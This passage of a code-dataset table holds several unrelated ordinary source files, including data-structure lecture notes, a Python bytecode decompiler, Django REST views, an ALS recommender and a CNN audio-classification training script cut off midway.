index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
21,500 | 8162c2d6562c2bd841130ec9b1837d64cb073bf8 | # Day 9 lecture notes
# Review
# The Secret of the Red Dot
# Slides with red dot are MORE IMPORTANT
# than the other slides
# Arrays, sets, binary search, bubble sort, selection sort, insertion sort, hashes, stacks, queues, recursion
# Arrays
# How they work
# List of objects
# Operations
# Read
# Search
# Insert
# Delete
# Key Concept
# Speed of an operation
# Measured in steps
# Search
# Looking for something in a DS
# How many steps to a search
# Linear Search - N
# Insert
# At end is 1 step
# In middle, have to shift everything
# Becomes N at worst
# Delete
# At end is 1 Step
# Anywhere else N steps worst
# Set
# DS that does not allow duplicates
# Reading
# Insert takes 2N + 1 steps
# Must ensure it's not already there
# Ordered array
# Same as array but it's values are kept in order
# Searching takes log N by using binary search
# Big O Notation
# Always represents the growth rate of the algorithm
# Read O(1)
# Search O(N)
# Binary Search O(logN)
# Bubble Sort
# Puts the highest in the right hand side on first pass
# if it doesn't need to swap in a passthrough it stops
# as the array is sorted
# Efficiency O(N^2)
# Optimizing code with or without Big O
# Selection Sort
# it finds smallest number then swaps it with the first
# number
# Insertion Sort
# In worst case, all algo are pretty bad
# But average case
# Insertion is good for MOSTLY sorted data
# Fully Random, doesn't matter
# If it's in reverse order, Selection Sort is best
# Hash Tables
# key,pair values
# Does REALLY REALLY fast reading, O(1)
# Dealing with Collisions
# This is when you try to add data to a cell that is taken
# You can put a dict in a slot to store multiples
# Worst case performance is O(N)
# Everything in one slot
# Three Factors
# How much data
# How many cells avail in table
# What hash function is being used
# Stacks and Queues
# Temp data
# Stacks LIFO
# Push to stack - end
# Pop from stack - end#
# Queue FIFO
# Push to queue - end
# Pop from queue - front
# Recursion
# a function that calls itself
# find base case, go up from there
# Base Case
# The value in which a method will not recurse
# Stack Overflow
# When you hit an infinite loop with a recursive algorithm |
21,501 | 53ba024516d68e740f4e8abfc49fb43e6b1c5429 | import re
from ast import literal_eval
from dataclasses import dataclass
from . import operations
COMPREHENSION = 1
GEN_EXPR = 1 << 2
RAW_JUMPS = 1 << 3
@dataclass
class Instruction:
line_num: int
offset: int
opname: str
arg: int
argval: object
def get_code_obj_name(s):
match = re.match(r"<code object <?(.*?)>? at (0x[0-9a-f]+).*>", s)
return match.group(1) + "_" + match.group(2)
def dis_to_instructions(disasm):
""" converts output of dis.dis into list of instructions"""
line_num = None
instructions = []
for line in disasm.split("\n"):
match = re.search(
r"( ?(?P<line_num>\d+)[ >]+)?(?P<offset>\d+) (?P<opname>[A-Z_]+)(?:\s+(?P<arg>\d+)(?: \((?P<argval>.+)\))?)?",
line
)
if match is not None:
if match["line_num"]:
line_num = int(match["line_num"])
offset = int(match["offset"])
opname = match["opname"]
if match["arg"] is not None:
arg = int(match["arg"])
else:
arg = None
if opname == "EXTENDED_ARG":
continue
argval = match["argval"]
instructions.append(Instruction(line_num, offset, opname, arg, argval))
return instructions
def is_store(instruction):
return instruction.opname in ("STORE_FAST", "STORE_NAME", "STORE_GLOBAL", "STORE_DEREF")
def is_identifier(s: str):
return str.isidentifier(s) and s not in ("True", "False", "None")
def instructions_to_asts(instructions, flags=0):
""" converts list of instruction into an AST"""
is_comp = flags & COMPREHENSION
is_genexpr = flags & GEN_EXPR
raw_jumps = flags & RAW_JUMPS
temp_name = "__temp" # name of temporary list/set/etc for comprehensions
indent = 0
arg_names = []
var_names = []
# list of all future changes in indentation (caused by loops,if,etc). format is (offset,change)
indent_changes = []
ast = []
instruction = None
def push(operation):
if raw_jumps:
ast.append((indent,operation,instruction.offset))
else:
ast.append((indent, operation))
def pop():
return ast.pop()[1]
def pop_n(n):
nonlocal ast
if n > 0: # ast[:-0] would be the empty list and ast[-0:] would be every element in ast
if raw_jumps:
ret = [x for _, x,_ in ast[-n:]]
else:
ret = [x for _, x in ast[-n:]]
ast = ast[:-n]
else:
ret = []
return ret
def peek(i=1):
return ast[-i][1]
def dedent_jump_to(offset):
for instruction2 in instructions:
if instruction2.opname == "JUMP_ABSOLUTE" and instruction2.arg == offset:
indent_changes.append((instruction2.offset + 2, -1))
break
def push_invalid(instruction):
push(operations.Invalid(instruction.opname, instruction.arg, instruction.argval))
i = 0
while i < len(instructions):
instruction = instructions[i]
opname = instruction.opname
if indent_changes:
to_remove = []
for indent_change in indent_changes:
if indent_change[0] == instruction.offset:
indent += indent_change[1]
to_remove.append(indent_change)
for indent_change in to_remove:
indent_changes.remove(indent_change)
if opname in ("LOAD_METHOD", "LOAD_ATTR"):
push(operations.Attribute(pop(), instruction.argval))
elif opname.startswith("LOAD"):
var_name = instruction.argval
if var_name.startswith(".") and (is_comp or is_genexpr):
var_name = "__" + var_name[1:]
if is_identifier(var_name):
if opname != "LOAD_GLOBAL" and var_name not in var_names:
arg_names.append(var_name)
var_names.append(var_name)
push(operations.Value(var_name))
elif is_store(instruction):
var_name = instruction.argval
if is_identifier(var_name):
var_names.append(var_name)
push(operations.Assign(var_name, pop()))
elif opname == "YIELD_VALUE":
push(operations.Yield(pop()))
elif opname == "RETURN_VALUE":
if is_comp:
push(operations.Return(operations.Value(temp_name)))
else:
push(operations.Return(pop()))
elif opname == "BUILD_MAP":
count = int(instruction.arg)
args = pop_n(2 * count)
push(operations.BuildMap(args))
elif opname == "BUILD_SLICE":
if instruction.arg == 2:
stop = pop()
start = pop()
push(operations.Slice(start, stop))
else:
step = pop()
stop = pop()
start = pop()
push(operations.Slice(start, stop, step))
elif opname.startswith("BUILD"):
# used to create lists, sets and tuples
operation = opname[len("BUILD_"):]
count = int(instruction.arg)
args = pop_n(count)
push(operations.build_operation(operation)(args))
elif opname == "GET_ITER":
push(operations.Iter(pop()))
elif opname == "FOR_ITER":
iterator = pop()
if isinstance(iterator, operations.Iter):
iterator = iterator.val
assign_op = instructions[i + 1] # get next instruction
i += 1
if is_store(assign_op):
index = assign_op.argval
var_names.append(index)
push(operations.ForLoop([index], iterator))
indent += 1
#detect end of loop
loop_end = int(instruction.argval[len("to "):])
indent_changes.append((loop_end, -1))
elif assign_op.opname == "UNPACK_SEQUENCE":
# loops like for i,j in zip(x,y)
num_vals = assign_op.arg
assign_ops = instructions[i + 1:i + num_vals + 1]
i += num_vals #skip all stores
indicies = []
for op in assign_ops:
var_name = op.argval
var_names.append(var_name)
indicies.append(var_name)
push(operations.ForLoop(indicies, iterator))
indent += 1
#detect end of loop
loop_end = int(instruction.argval[len("to "):])
indent_changes.append((loop_end, -1))
else:
push_invalid(instruction)
elif opname.startswith("POP_JUMP"): # if statements and while loops
val = pop()
if opname.endswith("TRUE"):
val = operations.unary_operation("not")(val)
jump_target = int(instruction.arg)
if raw_jumps:
val=val.val if opname.endswith("TRUE") else operations.unary_operation("not")(val)
push(operations.Jump(jump_target,val))
else:
if jump_target > instruction.offset:
indent_changes.append((jump_target, -1))
for instruction2 in instructions:
if instruction2.offset == jump_target - 2:
is_while = False
if instruction2.opname == "JUMP_ABSOLUTE" and instruction2.arg < instruction.offset:
for instruction3 in instructions:
if instruction3.offset > instruction.offset:
break
if instruction3.offset >= instruction2.arg and (
instruction3.opname.startswith("POP_JUMP") or
instruction3.opname == "FOR_ITER"
):
#either a if statement that is last statement in a loop or a while loop
is_while = instruction3.offset == instruction.offset
break
if is_while:
#instruction before jump target jumps above us and no POP_JUMPs between;
# this is a while loop
push(operations.WhileLoop(val))
if not is_while: # this is a normal if
if opname == "POP_JUMP_IF_TRUE" and instruction2.opname == "POP_JUMP_IF_FALSE":
#TODO: fix if statement with "or" operators
pass
if ast and isinstance(peek(), operations.Else):
pop()
indent -= 1
push(operations.Elif(val))
else:
push(operations.If(val))
break
else:
# this is a if statement that is the last statement in a for loop,
# so it jumps directly to the top of the for loop, so we dedent the JUMP_ABSOLUTE again
dedent_jump_to(jump_target)
push(operations.If(val))
indent += 1
elif opname == "JUMP_ABSOLUTE":
# used for many things, including continue, break, and jumping to the top of a loop
#TODO: continue in while loops
jump_target = int(instruction.arg)
if raw_jumps:
push(operations.Jump(jump_target))
else:
for instruction2 in instructions:
if instruction2.offset == jump_target:
if instruction2.opname == "FOR_ITER":
loop_end = int(instruction2.argval[len("to "):]) - 2
if loop_end != instruction.offset: # this isn't the end of the loop, but its still jumping, so this is a "continue"
if not isinstance(peek(), operations.Break):
push(operations.Continue())
#otherwise this is a normal jump to the top of the loop, so do nothing
else:
for instruction3 in instructions:
if (instruction3.opname == "FOR_ITER" and int(
instruction3.argval[len("to "):]
) == instruction2.offset) or (
instruction3.opname.startswith("POP_JUMP") and
instruction3.arg == instruction2.offset
):
#there is a loop also jumping to the same spot, so this is a "break"
push(operations.Break())
break
break
elif opname == "JUMP_FORWARD":
# used to jump over the else statement from the if statement's branch
jump_target = int(instruction.argval[len("to "):])
if raw_jumps:
push(operations.Jump(jump_target))
else:
indent -= 1
push(operations.Else())
indent += 2
indent_changes.append((jump_target, -1))
elif opname == "IMPORT_NAME":
fromlist = pop()
level = int(pop().val)
if level == 0: #absolute import
next_op = instructions[i + 1]
if is_store(next_op):
i += 1
alias = next_op.argval if next_op.argval != instruction.argval else None
push(operations.Import(instruction.argval, alias))
elif next_op.opname == "IMPORT_FROM":
names = []
i += 1
while next_op.opname == "IMPORT_FROM":
i += 1
assign_op = instructions[i]
names.append(assign_op.argval)
i += 1
next_op = instructions[i]
i -= 1
push(operations.FromImport(instruction.argval, names))
elif next_op.opname == "IMPORT_STAR":
i += 1
push(operations.FromImport(instruction.argval, [operations.Value("*")]))
else:
push_invalid(instruction)
else: #TODO:relative import
push_invalid(instruction)
elif opname == "RAISE_VARARGS":
argc = instruction.arg
if argc == 0:
push(operations.Raise())
elif argc == 1:
push(operations.Raise(pop()))
else:
push(operations.Raise(pop(), pop()))
elif opname in ("CALL_FUNCTION", "CALL_METHOD"):
argc = int(instruction.arg)
args = pop_n(argc)
func = pop()
push(operations.FunctionCall(func, args))
elif opname == "CALL_FUNCTION_KW":
# top of stack is a tuple of kwarg names pushed by LOAD_CONST
kwarg_names = literal_eval(pop().val)
kwargs = {}
for name in kwarg_names:
kwargs[name] = pop()
argc = int(instruction.arg) - len(kwargs)
args = pop_n(argc)
func = pop()
push(operations.FunctionCall(func, args, kwargs))
elif opname == "CALL_FUNCTION_EX":
if instruction.arg & 1: #lowest bit set
kwargs = pop()
args = pop()
func = pop()
push(
operations.FunctionCall(
func, [operations.UnpackSeq(args),
operations.UnpackDict(kwargs)]
)
)
else:
args = pop()
func = pop()
push(operations.FunctionCall(func, [operations.UnpackSeq(args)]))
elif opname == "MAKE_FUNCTION": # list comps, lambdas and nested functions
#TODO: handle the other flags
flags = instruction.arg
pop() # qualified name
code_obj = pop()
func_name = get_code_obj_name(code_obj.val)
if flags & 8:
closure_vars = pop().args
push(operations.Closure(func_name, closure_vars))
else:
push(operations.Value(func_name))
elif opname in ("LIST_APPEND", "SET_ADD"): #used in comprehensions
func = opname[opname.index("_") + 1:].lower()
if is_comp:
push(
operations.FunctionCall(
operations.Attribute(operations.Value(temp_name), operations.Value(func)),
[pop()]
)
)
else:
push_invalid(instruction)
elif opname == "MAP_ADD": #used in dict comprehensions
if is_comp:
key = pop()
val = pop()
push(operations.SubscriptAssign(key, operations.Value(temp_name), val))
else:
push_invalid(instruction)
elif opname == "UNPACK_SEQUENCE":
push(operations.UnpackSeq(pop()))
elif opname == "UNPACK_EX": # unpacking assignment
num_vals_before = instruction.arg & 0xff
num_vals_after = (instruction.arg >> 8) & 0xff #high byte
num_vals = num_vals_before + num_vals_after
assign_ops = []
for j in range(num_vals_before):
assign_ops.append(instructions[i + j + 1])
j += 1
assign_op = instructions[i + j + 1]
if is_store(assign_op): #list unpack
num_vals += 1
assign_op.argval = "*" + assign_op.argval
assign_ops.append(assign_op)
j += 1
for j in range(j, j + num_vals_after):
assign_ops.append(instructions[i + j + 1])
i += num_vals #skip all stores
names = []
for op in assign_ops:
var_name = op.argval
var_names.append(var_name)
names.append(var_name)
push(operations.Assign(operations.build_operation("tuple")(names), pop()))
elif opname == "COMPARE_OP":
right = pop()
left = pop()
push(operations.Comparison(instruction.argval, left, right))
elif opname == "BINARY_SUBSCR":
if isinstance(peek(), operations.Slice):
slice_ = pop()
val = pop()
push(operations.SubscriptSlice(val, slice_.start, slice_.stop, slice_.step))
else:
subscript = pop()
val = pop()
push(operations.Subscript(val, subscript))
elif opname == "STORE_SUBSCR":
push(operations.SubscriptAssign(pop(), pop(), pop()))
elif opname.startswith("UNARY"):
operation = opname[len("UNARY_"):]
push(operations.unary_operation(operation)(pop()))
elif opname.startswith("BINARY"):
operation = opname[len("BINARY_"):]
right = pop()
left = pop()
push(operations.binary_operation(operation)(left, right))
elif opname.startswith("INPLACE"):
operation = opname[len("INPLACE_"):]
right = pop()
left = pop()
if is_store(instructions[i + 1]):
i += 1
push(operations.inplace_operation(operation)(left, right))
else:
push_invalid(instruction)
elif opname not in ("NOP", "POP_TOP"):
push_invalid(instruction)
if i == 0 and is_comp: #give the temporary for list comps a name
push(operations.Assign(operations.Value(temp_name), pop()))
i += 1
return (ast, arg_names)
def asts_to_code(asts, flags=0,tab_char="\t"):
""" converts an ast into python code"""
if flags& RAW_JUMPS:
max_offset_len = len(str(asts[-1][2]))
return "\n".join(str(offset).ljust(max_offset_len," ") + tab_char * (indent + 1) + str(ast) for indent, ast, offset in asts)
else:
return "\n".join(tab_char * indent + str(ast) for indent, ast in asts)
def decompile(disasm, flags=0, tab_char="\t"):
instructions = dis_to_instructions(disasm)
asts, arg_names = instructions_to_asts(instructions, flags)
return asts_to_code(asts, flags,tab_char), arg_names
def split_funcs(disasm):
""" splits out comprehensions from the main func or functions from the module"""
start_positions = [0]
end_positions = []
names = []
if not disasm.startswith("Disassembly"):
names.append("main")
for match in re.finditer(r"Disassembly of (.+):", disasm):
end_positions.append(match.start())
start_positions.append(match.end())
name = match.group(1)
if name.startswith("<"):
names.append(get_code_obj_name(name))
else:
names.append(name)
end_positions.append(len(disasm))
if disasm.startswith("Disassembly"):
start_positions.pop(0)
end_positions.pop(0)
for start, end, name in zip(start_positions, end_positions, names):
yield (name, disasm[start:end])
def get_flags(name):
if name.startswith("genexpr"):
return GEN_EXPR
elif "comp" in name:
return COMPREHENSION
else:
return 0
def decompile_all(disasm,flags=0,tab_char="\t"):
disasm = re.sub(r"^#.*\n?", "", disasm, re.MULTILINE).strip() # ignore comments
for name, func in split_funcs(disasm):
yield name, *decompile(func, get_flags(name)|flags, tab_char)
def pretty_decompile(disasm,flags=0,tab_char="\t"):
ret = []
for name, code, arg_names in decompile_all(disasm, flags, tab_char):
ret.append(
f"def {name}({','.join(arg_names)}):\n" +
"\n".join(tab_char + line for line in code.split("\n"))
)
return "\n".join(ret)
|
21,502 | ee63f82268118aceb4453b78ed60a62e4dda5f49 | # 模N 位置,内容不变的list 的判断
def SameCycle(base, test):
# 长度不等
if not len(base) == len(test):
return False
S_b = set(base)
S_t = set(test)
# 内容不等
if not S_b == S_t:
return False
# 序列 + 内容 不等
first_base = base[0]
first_base_in_test = test.index(first_base)
for index in range(len(base)):
if not base[index] == test[(index + first_base_in_test) % len(base)]:
return False
return True
|
21,503 | 3f1a963fea126d2047ceda66dfa0f1adeed2aba3 | #-*- coding:utf8 -*-
import sys
from conf.options import actions
def help_msg():
"""
打印可选操作参数
:return:
"""
for k,v in actions.items():
print (k)
def from_command_run(argvs):
#如果不跟选项,打印帮助,退出
if len(argvs) < 2:
help_msg()
exit()
#如果选项不存在,报错退出
if argvs[1] not in actions:
sys.stderr.write('\033[1;33mOptions [%s] is not exists;\33[0m')
exit()
#将参数传递给函数,根据views执行相应操作
actions[argvs[1]](argvs[1:])
|
21,504 | 1bdd10384564552ba0fb9db01e60e1e9bdf4cff7 | # Copyright 2016 by Joao Rodrigues. All rights reserved.
# This code is part of the pydca distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Wrapper class to produce a single Stockholm file with custom annotations from a
jackhmmer/phmmer sequence search.
Depends heavily on Biopython SearchIO and AlignIO modules.
"""
from __future__ import print_function
from collections import namedtuple
import logging
import os
import tempfile
try:
# Python 3.3+
from shutil import which as _which
except ImportError:
def _which(executable):
"""
Returns None if the executable is not found in the PATH.
Source: http://stackoverflow.com/a/377028
"""
def is_exe(fpath):
"""Returns True if the path is an executable"""
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(executable)
if fpath:
if is_exe(executable):
return executable
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, executable)
if is_exe(exe_file):
return exe_file
return None
try:
from Bio import SeqIO
from Bio.Alphabet.IUPAC import IUPACProtein
from Bio.Alphabet import _verify_alphabet
except ImportError, err:
raise ImportError('[!] Could not import one or more biopython modules: {}'.format(err))
# Constants
CANONICAL_AA1 = set('ACDEFGHIKLMNPQRSTVWY')
# Classes
class HMMERRuntimeError(Exception):
"""Custom class to throw exceptions related to running HMMER"""
pass
class ParseError(Exception):
"""Custom class to throw exceptions related to parsing input/output"""
pass
class HMMERWrapper(object):
"""Wraps phmmer/jackhmmer to produce a custom-annotated Stockholm file.
Uses Biopython to call HMMER (default jackhmmer) on one or more protein sequences (file
or handle) and parses several output files to create a unified Stockholm file with the
full aligned sequences and a set of features for each hit (e.g. uniprot accession, hit
e-value, etc) and a set of per-file annotations (e.g. number of sequences, sequence
length, original HMMER parameters, etc). This file is a suitable input to create an
Alignment object.
Args:
sequence: sequence file, open file handle, or string with the data in FASTA format
database: a string with the path to the sequence database against which to run HMMER
executable: a string with the HMMER executable to call (optional) [def: jackhmmer]
evalue: a number in scientific notation with the expectation value threshold (optional)
ncpus: an integer with the number of CPUs to use in the HMMER calculation (optional)
niter: an integer with the number of iterations to use in jackhmmer (optional)
cleanup: a boolean to remove all files produced by HMMER
mock: a boolean to block the actual call to HMMER (use for testing only)
Returns:
stockof: the path to the Stockholm output file.
Raises:
HMMERRuntimeError: An error occured while executing HMMER.
ParseError: An error occured while parsing the output of HMMER.
OSError: HMMER executable cannot be found.
TypeError: input/output does not match expected format.
"""
def __init__(self, sequence, database=None, executable='jackhmmer', **kwargs):
# Empty container for parsed/validated sequences
self.sequences = []
self.database = database
# Setup logging with module name
self.logger = logging.getLogger(__name__)
# Iterate over kwargs and define defaults if not user-provided
_defaults = {'evalue': 1E-20,
'ncpus': 2,
'niter': 5,
'mock': False}
for kwarg in _defaults:
kwarg_val = kwargs.get(kwarg)
if not kwarg_val:
kwarg_val = _defaults[kwarg]
setattr(self, kwarg, kwarg_val)
# Validate sequence data and locate executable
self.__validate(sequence)
if not _which(executable):
raise OSError("HMMER executable not found in PATH: '{}'".format(executable))
# run HMMER
def __validate(self, seqdata):
"""Verifies the user provided input is either a file or a file-like object
containing sequence data.
Args:
seqdata: a string (path to file) or file-like object.
Returns:
A list with one namedtuple per input sequence.
Raises:
TypeError: if the input is not a string or a file-like object.
ParseError: if the sequence contains others than the 20 canonical AAs.
"""
_Sequence = namedtuple('Seq', ['name', 'data'])
# file-like object
# isinstance(obj, file) does not hold in Py3
if hasattr(seqdata, 'read') and hasattr(seqdata, 'name'):
self.logger.debug('Reading data from file-like object {}'.format(seqdata.name))
fname = seqdata.name
elif isinstance(seqdata, basestring):
self.logger.debug('Reading data from file path {}'.format(seqdata))
fname = seqdata
# can be file name string or sequence
if not os.path.isfile(fname):
raise OSError('Sequence file not found: {}'.format(seqdata))
else:
raise TypeError('Sequence input format not recognized: {}'.format(seqdata))
# parse and validate sequences
# defining these two a prior just in case later we decide to support more stuff
_seq_alphabet = IUPACProtein()
_seq_format = 'fasta'
seq_iterator = SeqIO.parse(seqdata, _seq_format, alphabet=_seq_alphabet)
for seq_i, seq_record in enumerate(seq_iterator, start=1):
seq_name = seq_record.name
seq_raw = str(seq_record.seq)
if not _verify_alphabet(seq_record.seq):
msg = 'Entry #{} ({}) in {} is not a valid protein sequence'
raise ParseError(msg.format(seq_i, seq_name, fname))
self.sequences.append(_Sequence(seq_name, seq_raw))
return self.sequences
def run(self):
"""Launches the HMMER executable on the user data"""
pass
|
21,505 | d01e228374550e9192aaa0b139622bef6912888e | from rest_framework.viewsets import ModelViewSet
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from rest_framework_jwt.settings import api_settings
from rest_framework.authtoken.serializers import AuthTokenSerializer
from django.contrib.auth import authenticate, login
from rest_framework.views import APIView, status
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from app.serializers import UserSerializer, ArticlesSerializer, TokenSerializer
from app.permissions import IsOwnerOrReadOnly
from app.models import Articles
from app.models import User
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER
# Create your views here.
class UserViewSet(ModelViewSet):
"""UserViewSet Class"""
serializer_class = UserSerializer
queryset = User.objects.all().order_by('id')
permission_classes = [IsAuthenticatedOrReadOnly, ]
http_method_names = ['get', 'post']
class ArticlesViewSet(ModelViewSet):
"""ArticlesViewSet Class"""
serializer_class = ArticlesSerializer
queryset = Articles.objects.all()
permission_classes = [IsAuthenticatedOrReadOnly, IsOwnerOrReadOnly]
http_method_names = ['get', 'post', 'put', 'delete']
def perform_create(self, serializer):
serializer.save(author=self.request.user)
class LoginViewSet(ViewSet):
""" checks username and password and return auth token """
serializer_class = AuthTokenSerializer
def create(self, request):
""" Use the ObtainAuthToken APIView to validate and create a token """
username = request.data.get('username', '')
password = request.data.get('password', '')
user = authenticate(request, username=username, password=password)
if user is not None:
# login saves the user’s ID in the session,
# using Django’s session framework.
login(request, user)
serializer = TokenSerializer(data={
# using drf jwt utility functions to generate a token
'token': jwt_encode_handler(
jwt_payload_handler(user)
)})
serializer.is_valid()
return Response(serializer.data, message='login successful')
return Response(
{"message": "Invalid credentials"},
status=status.HTTP_401_UNAUTHORIZED
)
|
21,506 | 7918a765315aedf88d1d009e51c74e246896f155 | # TwitterTag.py
# (C)2012
# Scott Ernst
import string
from StaticFlow.render.enum.GeneralSizeEnum import GeneralSizeEnum
from StaticFlow.render.enum.TagAttributesEnum import TagAttributesEnum
from StaticFlow.render.tags.MarkupTag import MarkupTag
from pyaid.json.JSON import JSON
from pyaid.string.StringUtils import StringUtils
#___________________________________________________________________________________________________ TwitterTag
class TwitterTag(MarkupTag):
"""A class for..."""
#===================================================================================================
# C L A S S
TAG = 'twitter'
TEMPLATE = 'markup/external/twitter.mako'
BLOCK_DISPLAY = True
PRIMARY_ATTR = TagAttributesEnum.SEARCH[0]
#===================================================================================================
# P U B L I C
#___________________________________________________________________________________________________ getAttributeList
@classmethod
def getAttributeList(cls):
t = TagAttributesEnum
return MarkupTag.getAttributeList() + t.SEARCH + t.HEIGHT + t.COUNT + t.START + t.STOP + \
t.IGNORE + t.TITLE + t.SUBTITLE + t.COUNT + t.SCROLL + t.TIME + t.LOOP
#===================================================================================================
# P R O T E C T E D
#___________________________________________________________________________________________________ _renderImpl
def _renderImpl(self, **kwargs):
if self._processor.globalVars:
self._processor.globalVars.includeTwitterWidgetAPI = True
a = self.attrs
q = a.get(TagAttributesEnum.SEARCH, '@vizme', kwargs)
start = a.get(TagAttributesEnum.START, None, kwargs)
stop = a.get(TagAttributesEnum.STOP, None, kwargs)
skips = a.get(TagAttributesEnum.IGNORE, None, kwargs)
height = a.getAsEnumerated(TagAttributesEnum.HEIGHT, GeneralSizeEnum, GeneralSizeEnum.medium)
title = a.get(TagAttributesEnum.TITLE, '', kwargs)
subtitle = a.get(TagAttributesEnum.SUBTITLE, '', kwargs)
count = a.get(TagAttributesEnum.COUNT + TagAttributesEnum.TWEETS, 10, kwargs)
scrollbar = a.getAsBool(TagAttributesEnum.SCROLL, count > 5, kwargs)
interval = a.getAsInt(TagAttributesEnum.TIME, 5, kwargs)
loop = a.getAsBool(TagAttributesEnum.LOOP, interval > 0, kwargs)
if not isinstance(q, list):
q = [q]
user = len(q) == 1 and q[0].startswith('@') and not StringUtils.contains(q[0], [' ', ','])
q = u' OR '.join(q)
if height in ['none', 'm']:
height = 300
elif height == 'xxs':
height = 100
elif height == 'xs':
height = 175
elif height == 's':
height = 250
elif height == 'l':
height = 375
elif height == 'xl':
height = 450
elif height == 'xxl':
height = 525
else:
height = 300
if skips:
user = False
q += u' ' + (u'-' + skips if isinstance(skips, basestring) else u' -'.join(skips))
if start or stop:
user = False
if start:
q += u' since:' + start
if stop:
q += u' until:' + stop
data = {
'id':a.id.get(),
'version':2,
'width':'auto',
'height':height,
'interval':1000*interval,
'theme': {
'shell': {
'background': a.backColors.baseColor.web,
'color': a.focalColors.highlightColor.web
},
'tweets': {
'background': a.backColors.baseColor.web,
'color': a.focalColors.baseColor.web,
'links': a.focalColors.linkColor.web
}
},
'features': {
'scrollbar':scrollbar,
'loop':loop,
'live':interval > 0,
'behavior': u'all' if user else u'default'
},
'type': 'profile' if user else 'search'
}
if user:
a.render['setUser'] = u'.setUser("' + q + u'")'
data['rpp'] = count
else:
a.render['setUser'] = u''
data['search'] = q
data['title'] = subtitle.capitalize() if subtitle else string.capwords(q)
data['subject'] = title.capitalize() if title else string.capwords(q.split(' ')[0])
a.render['twitterData'] = JSON.asString(data).replace("'", "\\'")
#___________________________________________________________________________________________________ _renderImpl
def _getAsBooleanString(self, test):
return u'true' if test else u'false'
|
21,507 | d6975b5994b500cf885ae5768cdacc778b7d3d1e | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import implicit
import pandas as pd
from scipy.sparse import coo_matrix
import heapq
# read first 3 columns into a dataframe
dataFile = './data/u.data'
data = pd.read_csv(dataFile, sep='\t', header=None, usecols=[0,1,2], names=['userId','itemId','rating'])
# print(data.head())
# convert dataframe to matrix of users v items, with ratings as values
data['userId'] = data['userId'].astype('category')
data['itemId'] = data['itemId'].astype('category')
rating_matrix = coo_matrix((
data['rating'].astype(float),
(
data['itemId'].cat.codes.copy(),
data['userId'].cat.codes.copy(),
)
))
# split matrix into users v factors and factors v items matrices, using als algorithm
model = implicit.als.AlternatingLeastSquares(factors=10, regularization=0.1)
model.fit(rating_matrix)
user_factors, item_factors = model.item_factors, model.user_factors
# to get the predicted ratings for all movies by this user:
# take one row from the user_factors matrix - which represents one user
# then take dot product of that row with all the columns in the item factors
user196 = item_factors.dot(user_factors[196])
# then sort these ratings in descending order and pick the top3 rated movies recommended for this user
recommendations = heapq.nlargest(3, range(len(user196)), user196.take)
print(recommendations)
|
21,508 | 119e2072580a91c14cee2138a8eb2bbea82492ed | #!/usr/bin/env python3
import time
from multiprocessing import cpu_count
from typing import Union, NamedTuple
from dataset import UrbanSound8KDataset
from model import CNN
from trainer import Trainer
import torch
import torch.backends.cudnn
import numpy as np
from torch import nn, optim
from torch.nn import functional as F
import torchvision.datasets
from torch.optim.optimizer import Optimizer
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from torchvision import transforms
import argparse
from pathlib import Path
torch.backends.cudnn.benchmark = True
parser = argparse.ArgumentParser(
description="Train a simple CNN on CIFAR-10",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
default_dataset_dir = Path.home() / ".cache" / "torch" / "datasets"
parser.add_argument("--dataset-root", default=default_dataset_dir)
parser.add_argument("--log-dir", default=Path("logs"), type=Path)
parser.add_argument("--learning-rate", default=1e-3, type=float, help="Learning rate")
parser.add_argument(
"--batch-size",
default=32,
type=int,
help="Number of images within each mini-batch",
)
parser.add_argument(
"--epochs",
default=50,
type=int,
help="Number of epochs (passes through the entire dataset) to train for"
)
parser.add_argument(
"--val-frequency",
default=2,
type=int,
help="How frequently to test the model on the validation set in number of epochs",
)
parser.add_argument(
"--log-frequency",
default=10,
type=int,
help="How frequently to save logs to tensorboard in number of steps",
)
parser.add_argument(
"--print-frequency",
default=10,
type=int,
help="How frequently to print progress to the command line in number of steps",
)
parser.add_argument(
"-j",
"--worker-count",
default=cpu_count(),
type=int,
help="Number of worker processes used to load data.",
)
parser.add_argument(
"--checkpoint-path",
default=Path("checkpointLMC.pkl"),
type=Path,
help="Provide a file to store checkpoints of the model parameters during training."
)
parser.add_argument(
"--checkpoint-frequency",
type=int,
default=10,
help="Save a checkpoint every N epochs"
)
parser.add_argument(
"--mode",
default="LMC",
type=str,
help="LMC, MC, or MLMC"
)
parser.add_argument(
"--dropout",
default=0.5,
type=float,
)
parser.add_argument(
"--weight-decay",
default=1e-3,
type=float,
)
if torch.cuda.is_available():
DEVICE = torch.device("cuda")
else:
DEVICE = torch.device("cpu")
def main(args):
    """Train and evaluate the UrbanSound8K CNN configured by ``args``.

    Builds the train/test DataLoaders, instantiates the CNN for the chosen
    feature mode, and runs the training loop, logging to TensorBoard.

    Args:
        args: parsed CLI arguments (see the module-level ``parser``).
    """
    args.dataset_root.mkdir(parents=True, exist_ok=True)
    # Honour the CLI flags: --batch-size and --worker-count were previously
    # defined by the parser but silently ignored (hard-coded 32 / 8).
    train_loader = torch.utils.data.DataLoader(
        UrbanSound8KDataset('UrbanSound8K_train.pkl', mode=args.mode),
        batch_size=args.batch_size, shuffle=True,
        num_workers=args.worker_count, pin_memory=True)
    test_loader = torch.utils.data.DataLoader(
        UrbanSound8KDataset('UrbanSound8K_test.pkl', mode=args.mode),
        batch_size=args.batch_size, shuffle=False,
        num_workers=args.worker_count, pin_memory=True)
    # LMC/MC spectrogram inputs are 85x41; MLMC stacks them into 145x41.
    if args.mode in ("LMC", "MC"):
        model = CNN(height=85, width=41, channels=1, class_count=10,
                    dropout=args.dropout, mode=args.mode)
    elif args.mode == "MLMC":
        model = CNN(height=145, width=41, channels=1, class_count=10,
                    dropout=args.dropout, mode=args.mode)
    elif args.mode == "TSCNN":
        # TSCNN lives in a separate script; return early instead of falling
